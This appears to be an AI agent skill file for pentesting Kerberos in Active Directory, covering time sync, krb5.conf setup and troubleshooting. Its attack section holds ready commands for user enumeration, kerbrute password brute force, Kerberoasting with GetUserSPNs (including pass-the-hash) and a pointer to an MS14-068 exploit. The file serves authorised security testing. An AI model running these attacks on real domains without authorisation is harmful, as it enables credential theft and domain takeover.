Hacktricks-skills kerberos-pentesting

Pentest Kerberos services (port 88/tcp/udp) in Active Directory environments. Use this skill whenever the user mentions Kerberos, port 88, AD authentication, TGT tickets, krb5.conf, GSSAPI, or needs to authenticate to Windows/AD services. Also trigger for Kerberos enumeration, brute force attacks, MS14-068 exploitation, or any AD pentesting task involving authentication protocols.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-kerberos-88/pentesting-kerberos-88/SKILL.MD
source content

Kerberos Pentesting Skill

A comprehensive guide for pentesting Kerberos authentication services in Active Directory environments.

What This Skill Does

This skill helps you:

  • Set up Kerberos authentication for pentesting tools
  • Troubleshoot Kerberos connection issues
  • Enumerate users and services via Kerberos
  • Perform Kerberos-based attacks and exploitation
  • Configure proper time synchronization and realm settings

Quick Start

1. Time Synchronization (Critical)

Kerberos requires time sync within 5 minutes. If your clock is skewed, you'll see KRB_AP_ERR_SKEW errors.

# Quick one-shot sync (requires sudo)
sudo ntpdate <dc.fqdn>
# Alternative with chronyd
sudo chronyd -q 'server <dc.fqdn> iburst'

2. Generate krb5.conf

You need a valid krb5.conf for the target realm. Use netexec to generate one:

# Generate krb5.conf while testing SMB
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf

# Install it
sudo cp krb5.conf /etc/krb5.conf

3. Obtain TGT and Verify

# Get Ticket Granting Ticket
kinit <user>

# Verify the ticket is in your ccache
klist

4. Use Kerberos with Tools

# netexec / CME with Kerberos (no password needed)
netexec smb <dc.fqdn> -k

# SMB client with Kerberos
smbclient --kerberos //<dc.fqdn>/IPC$

# SSH with GSSAPI (OpenSSH to Windows OpenSSH)
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>

Common Issues and Solutions

"Server not found in Kerberos database"

This means the FQDN you're using doesn't match the host SPN. Ensure:

  • Your /etc/hosts resolves the exact FQDN you'll connect to
  • The FQDN comes before any bare domain entries if overriding DNS
  • You're using the correct realm name in krb5.conf

"STATUS_NOT_SUPPORTED" on SMB

NTLM is disabled on the target. Force Kerberos:

netexec smb <dc.fqdn> -k  # The -k flag forces Kerberos

"KRB_AP_ERR_SKEW"

Time is out of sync. Run the time sync commands above.

Enumeration and Attacks

User Enumeration

# Enumerate users via Kerberos
nmap -p 88 --script=krb5-enum-users \
  --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} \
  {IP}

Brute Force with kerbrute

# Clone kerbrute
git clone https://github.com/ropnop/kerbrute.git ./kerbrute
cd kerbrute && go build

# User enumeration
./kerbrute userenum -d domain.com -u users.txt

# Password brute force
./kerbrute bruteuser -d domain.com -u username -p passwords.txt

GetUserSPNs.py

Get Service Principal Names for potential Kerberoasting:

# Request SPNs
GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs

# With hash
GetUserSPNs.py -hashes :{hash} -dc-ip {IP} active.htb/svc_tgs

MS14-068 Exploitation

The MS14-068 vulnerability allows tampering with Kerberos login tokens to claim elevated privileges (e.g., Domain Admin).

Reference: https://adsecurity.org/?p=541

Exploit: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek

Helper Scripts

Use the bundled scripts for common tasks:

  • scripts/check-krb5-config.sh - Validate your krb5.conf setup
  • scripts/sync-time.sh - Quick time synchronization
  • scripts/test-kerberos-auth.sh - Test Kerberos authentication
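As an added example (not the skill's bundled scripts/check-krb5-config.sh, whose contents are not shown here), the checks below cover the two setup failures described above: a krb5.conf with no usable default_realm or kdc, and an /etc/hosts line where the FQDN is not the canonical name. The sample krb5.conf and hosts content are constructed, and the realm CORP.EXAMPLE.LOCAL and host dc01.corp.example.local are placeholders.

```shell
# Added example, not the skill's bundled scripts/check-krb5-config.sh: static
# checks a practitioner would run before kinit, on constructed input only.

# Constructed krb5.conf in the layout kinit expects; not real netexec output.
SAMPLE_KRB5_CONF='[libdefaults]
    default_realm = CORP.EXAMPLE.LOCAL
    dns_lookup_kdc = false

[realms]
    CORP.EXAMPLE.LOCAL = {
        kdc = dc01.corp.example.local
    }
'

# Constructed /etc/hosts fragment: the FQDN is listed first after the address.
SAMPLE_HOSTS='127.0.0.1 localhost
10.10.10.100 dc01.corp.example.local corp.example.local dc01'

# Print the default_realm from a krb5.conf read on stdin.
krb5_default_realm() {
    sed -n 's/^[[:space:]]*default_realm[[:space:]]*=[[:space:]]*//p' | head -n 1
}

# Print the first kdc configured for realm $1 in a krb5.conf read on stdin.
krb5_kdc_for_realm() {
    awk -v realm="$1" '
        $1 == realm && $2 == "=" && $3 == "{" { inrealm = 1; next }
        inrealm && $1 == "}"                  { inrealm = 0 }
        inrealm && $1 == "kdc" && $2 == "="   { print $3; exit }'
}

# Succeed only if the config names a realm, the realm is upper-case (realm
# names are case-sensitive; AD realms are conventionally upper-case) and it defines a kdc.
krb5_conf_ok() {
    realm=$(printf '%s' "$1" | krb5_default_realm)
    [ -n "$realm" ] || { echo "no default_realm set"; return 1; }
    upper=$(printf '%s' "$realm" | tr '[:lower:]' '[:upper:]')
    [ "$realm" = "$upper" ] || { echo "realm $realm is not upper-case"; return 1; }
    kdc=$(printf '%s' "$1" | krb5_kdc_for_realm "$realm")
    [ -n "$kdc" ] || { echo "no kdc for realm $realm"; return 1; }
    echo "ok: realm=$realm kdc=$kdc"
}

# Succeed only if $2 is the canonical (first) name on some line of the hosts
# content $1; a short name or bare domain listed first breaks SPN matching.
hosts_fqdn_first() {
    printf '%s\n' "$1" | awk -v fqdn="$2" \
        '$1 !~ /^#/ && $2 == fqdn { found = 1 } END { exit (found ? 0 : 1) }'
}
```

Run `krb5_conf_ok "$(cat /etc/krb5.conf)"` and `hosts_fqdn_first "$(cat /etc/hosts)" <dc.fqdn>` against the real files before kinit; a non-zero exit points at the misconfiguration behind "Server not found in Kerberos database".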

Important Notes

  1. Kerberos authenticates but doesn't authorize - It confirms the user's identity but doesn't manage resource permissions; services handle access control after authentication.

  2. Always use FQDNs - Kerberos is sensitive to exact hostname matching. Use fully qualified domain names.

  3. CCache is key - Once you have a TGT in your ccache, you can authenticate without passwords. Keep it secure.

  4. NTLM vs Kerberos - If NTLM is disabled on domain services, you MUST use Kerberos. Add -k to tools that support it.

References